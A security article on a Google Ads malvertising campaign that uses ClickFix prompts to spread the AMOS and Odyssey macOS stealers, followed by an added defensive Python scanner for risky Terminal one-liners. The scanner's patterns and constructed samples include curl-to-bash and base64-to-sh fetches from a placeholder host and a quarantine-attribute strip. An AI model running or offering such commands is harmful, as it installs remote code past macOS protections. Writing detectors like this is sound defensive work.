A malvertising campaign is using Google Ads to push counterfeit download sites for popular macOS tools, including Homebrew, LogMeIn, and TradingView. More than 85 such domains have been observed, all serving information-stealing malware, chiefly AMOS and Odyssey. The sites rely on "ClickFix" social engineering: a fake verification or fix-it prompt persuades the visitor to copy a command and run it in Terminal.
The command, typically framed as a security or "human verification" step, downloads and runs a script that in turn fetches the stealer payload. The script sidesteps Gatekeeper by stripping the com.apple.quarantine extended attribute from what it downloads, so macOS never warns that the binary is unsigned or unnotarized. Once running, the malware checks for virtualized environments, terminates processes such as OneDrive updaters, and runs with root privileges to avoid detection.
The goal is to harvest sensitive data: browser-stored credentials, cryptocurrency wallet data, and personal files, all of which are exfiltrated to attacker infrastructure. Both AMOS and Odyssey are capable stealers; AMOS additionally installs a persistent backdoor. Users should never paste commands they do not understand into Terminal, and should obtain software only from official, verified sources (for Homebrew, that is the install command published on brew.sh, not a link reached through an ad).
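The two paragraphs above describe the tell-tale shape of a ClickFix one-liner (a remote fetch or base64 decode piped straight into a shell, often combined with stripping the quarantine attribute or sudo). The script below is an added example, not code from the article or from the malware, that flags such commands in pasted text or in a zsh history file. The indicator patterns are generic macOS "paste this into Terminal" tells and are an assumption of this example, not the campaign's actual commands; the sample history lines are constructed.

```python
"""Flag ClickFix-style shell one-liners in pasted commands or zsh history.

Added example, not part of the original article or of the malware's code.
Indicator patterns are generic (an assumption), not the campaign's commands.
"""
from __future__ import annotations

import re
from pathlib import Path

# STRONG indicators are rarely typed by hand for a legitimate install;
# SUPPORTING ones only justify a closer look.
STRONG = {
    "remote_fetch_to_shell": re.compile(r"\b(curl|wget)\b.*\|\s*(sudo\s+)?(ba|z)?sh\b"),
    "decode_to_shell": re.compile(r"\bbase64\b.*\|\s*(sudo\s+)?(ba|z)?sh\b"),
    "quarantine_strip": re.compile(r"\bxattr\b.*com\.apple\.quarantine"),
}
SUPPORTING = {
    "sudo_elevation": re.compile(r"\bsudo\b"),
    "osascript_exec": re.compile(r"\bosascript\b"),
}

_ZSH_PREFIX = re.compile(r"^: \d+:\d+;")  # zsh EXTENDED_HISTORY ": <ts>:<dur>;" prefix


def strip_history_prefix(line: str) -> str:
    """Return the bare command from a zsh (or plain bash) history line."""
    return _ZSH_PREFIX.sub("", line).strip()


def indicators(command: str) -> list[str]:
    """Names of the indicators that match a single command (strong ones first)."""
    cmd = strip_history_prefix(command)
    hits = [name for name, rx in STRONG.items() if rx.search(cmd)]
    hits += [name for name, rx in SUPPORTING.items() if rx.search(cmd)]
    return hits


def verdict(command: str) -> str:
    """'block' on any strong indicator, 'review' on supporting-only, else 'ok'."""
    hits = indicators(command)
    if any(h in STRONG for h in hits):
        return "block"
    return "review" if hits else "ok"


def scan_lines(lines) -> list[tuple[str, str, list[str]]]:
    """Return (command, verdict, indicators) for every line that is not 'ok'."""
    out = []
    for raw in lines:
        cmd = strip_history_prefix(raw)
        if not cmd:
            continue
        v = verdict(cmd)
        if v != "ok":
            out.append((cmd, v, indicators(cmd)))
    return out


def scan_history(path: str | Path | None = None):
    """Scan a real history file; zsh may store non-UTF-8 bytes, hence errors='replace'."""
    path = Path(path) if path else Path.home() / ".zsh_history"
    text = path.read_text(encoding="utf-8", errors="replace")
    return scan_lines(text.splitlines())


# Constructed sample lines (not from the campaign) in zsh EXTENDED_HISTORY format.
SAMPLE_HISTORY = [
    ": 1700000000:0;brew install wget",
    ": 1700000010:0;curl -fsSL https://example.invalid/setup.sh | bash",
    ': 1700000020:0;echo "Y3VybCBodHRwczovL2V4YW1wbGUuaW52YWxpZC9hIHwgc2g=" | base64 -d | sh',
    ": 1700000030:0;xattr -d com.apple.quarantine ~/Downloads/Installer.dmg && open ~/Downloads/Installer.dmg",
    ": 1700000040:0;sudo softwareupdate -l",
    ": 1700000050:0;git clone https://github.com/Homebrew/brew",
]

if __name__ == "__main__":
    for cmd, v, hits in scan_lines(SAMPLE_HISTORY):
        print(f"{v:6} {', '.join(hits):24} {cmd}")
```

Run it against a real machine with `python3 clickfix_scan.py` after replacing `SAMPLE_HISTORY` with `scan_history()`; a "block" hit in a user's history is a good reason to look for a freshly dequarantined binary and a persistence item, since a legitimate `brew install` never needs `xattr -d` or a pipe into `sh`. The `ssh` command deliberately does not match the `(ba|z)?sh` alternative, so `curl ... | ssh host` is not a false positive.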
